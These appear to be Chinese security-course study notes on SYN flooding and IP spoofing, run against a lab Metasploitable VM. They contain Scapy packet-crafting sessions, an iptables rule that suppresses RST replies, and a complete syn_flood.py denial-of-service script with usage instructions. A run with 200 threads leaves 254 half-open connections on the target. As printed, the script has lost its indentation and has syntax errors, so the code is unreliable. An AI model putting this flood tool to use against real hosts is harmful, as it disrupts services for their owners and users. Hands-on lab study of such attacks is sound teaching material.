【安全牛学习笔记】Syn-Flood、IP地址欺骗
Syn-Flood
常伴随IP欺骗
- 真正的攻击目标
Scapy
- i=IP()
- i.dst=1.1.1.1
- i.display()
- t=TCP()
- sr1(i/t,verbose=1,timeout=3)
- sr1(IP(dst=1.1.1.1)/TCP())
msfadmin@metasploitable:~$ ifconfig
root@K:~# scapy
INFO: Can't import python gnuplot wrapper. Won't be able to plot.
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.3.2)
>>> exit()
root@K:~# apt-get install python gnuplot
root@K:~# scapy
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.3.2)
>>> i=IP()
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 127.0.0.1
dst= 127.0.0.1
\options\
>>> i.dst="192.168.1.110"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.109
dst= 192.168.1.110
\options\
>>> t=TCP()
>>> t.display()
###[ TCP ]###
sport= ftp_data
dport= http
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>> t.dport=22
>>> t.display()
###[ TCP ]###
sport= ftp_data
dport= ssh
seq= 0
ack= 0
dataofs= None
reserved= 0
flags= S
window= 8192
chksum= None
urgptr= 0
options= {}
>>> sr1(i/t,verbose=1,timeout=2)
Begin emission:
Finished to send 1 packets.
Received 2 packets, got 1 answers, remaining 0 packets
<IP version= 4L ihl=5L tos= 0x0 len=44 id= 1 flags=DF frag=0L ttl= 64 proto= tcp chksum=0xb6a0 src= 192.168.1.110 dst= 192.168.1.109 options=[] |<TCP sport= ssh dport=ftp_data seq=3703105205 ack= 1 dataofs= 6L reserved=0L flags=SA window=5840 chksum=0x397d urgptr= 0 options= {('MSS',1460)} |<Padding load='\x00\x00' |>>>
wireshark
ip.addr eq 192.168.1.110
Syn-Flood
攻击脚本:./syn_flood.py
- iptables -A OUTPUT -p tcp --tcp-flags RST -d 1.1.1.1 -j DROP
- netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'
- windows系统默认半开连接数10个
LISTEN S 服务器端口处于侦听状态,等待连接请求
SYN-SENT C 发起连接请求,等待对端响应
SYN-RECV S 已收到连接请求
ESTABLISHED C/S 三次握手成功,TCP连接已经建立
FIN-WAIT-1 C/S 等待对端响应中断请求确认,或对端中断请求
FIN-WAIT-2 C/S 等待对端发送中断请求
CLOSE-WAIT C/S 等待本地 进程/用户 关闭连接
CLOSING C/S 等待对端响应连接中断确认
LAST-ACK C/S 等待对端响应之前的连接中断确认
TIME-WAIT C/S 等待足够时间长度确保对端收到连接中断确认(最大4分钟)
CLOSED C/S 无任何连接状态
root@K:~# iptables -A OUTPUT -p tcp --tcp-flags RST -d 192.168.1.110 -j DROP
root@K:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.110 tcp flags:RST/RST
root@K:~# cp /media/sf_D_DRIVE/脚本/syn_flood.py . //拷贝到当前目录
root@K:~# ls
Desktop Downloads Pictures syn_flood.py Videos
Documents Music Public Templates
root@K:~# geany syn_flood.py
------------------------------------------------------------
#!/usr/bin/python
# .*. coding: utf-8 -*
# SYN-flood lab script exactly as transcribed on this page (the `geany
# syn_flood.py` listing); kept verbatim so the traffic pattern it generates
# can be studied for detection. Usage, per the messages below:
#   ./syn_flood.py <target IP> <port> <thread count>
from scapy.all import *
from time import sleep
import thread
import random
import logging
# Raise Scapy's runtime log threshold so per-packet notices do not flood the console.
logging.getLogger("scapy.runtime").setLevel(Logging.ERROR)
# Exactly three positional arguments are expected; otherwise print usage and exit.
if len(sys.argv) != 4:
print "用法: ./syn_flood.py [IP地址] [端口] [线程数]"
print "举例: ./syn_flood.py 1.1.1.1 80 20"
sys.exit()
target = str(sys.argv[1])
port = int(sys.argv[2])
threads = int(sys.argv[3])
print "正在执行 SYN flood 攻击,按 Ctrl+C 停止攻击."
# Worker loop: sends one IP/TCP packet per iteration to target:port, each from a
# freshly randomised source port. TCP() is built with its defaults, which the
# t.display() output earlier on the page shows as flags=S, so every packet is a
# bare SYN; no IP src is set, so Scapy fills in the sender's own address (as in
# the i.display() output above), making the traffic attributable to the sender.
# Defender's view: a burst of SYNs with random sports and no follow-up ACK, and
# a climbing SYN_RECV count on the target (see the netstat output later on the
# page), are the detection signals; SYN cookies and SYN rate limiting are the
# usual mitigations.
def synflood(target,port):
while 0 == 0
x = random.randint(0,65535)
send(IP(dst=target)/TCP(dport=port,sport=x),verbose=0)
# Start `threads` workers; each runs synflood independently and never returns,
# so the main thread just sleeps to keep the process alive until Ctrl+C.
for x in range(0,threads):
thread.start_new_thread(synflood, (target,port))
while 0 == 0
sleep(1)
------------------------------------------------------------
root@K:~# ./syn_flood.py
WARNING: No route found for IPv6 destination :: (no default route?)
用法: ./syn_flood.py [IP地址] [端口] [线程数]
举例: ./syn_flood.py 1.1.1.1 80 20
root@K:~# ./syn_flood.py 192.168.1.110 22 200
root@K:~# ssh msfadmin@192.168.1.110
The authenticity of host '192.168.1.110 (192.168.1.110)' can't be established.
RSA key fingerprint is SHA256:BQHM5EoHx9GCi0LuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.110' (RSA) to the list of known hosts.
msfadmin@192.168.1.110's password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jun 16 07:25:55 2016
msfadmin@metasploitable:~$ exit
logout
Connection to 192.168.1.110 closed.
root@K:~# ssh msfadmin@192.168.1.110
msfadmin@metasploitable:~$ sudo netstat -n
msfadmin@metasploitable:~$ sudo netstat -n | awk '/^tcp/{++S[$NF]} END {for(a in S) print a,S[a]}'
SYN_RECV 254
C:\> net user yuanfh 123
root@K:~# openvas-stop
Stopping Openvas Services
root@K:~# rdesktop 192.168.1.111
root@K:~# netstat -pantu | more
IP地址欺骗
经常用于DoS攻击
根据IP头地址寻址
- 伪造IP源地址
边界路由器过滤
- 入站、出站
受害者可能是源、目的地址
绕过基于地址的验证
压力测试模拟多用户
上层协议(TCP序列号)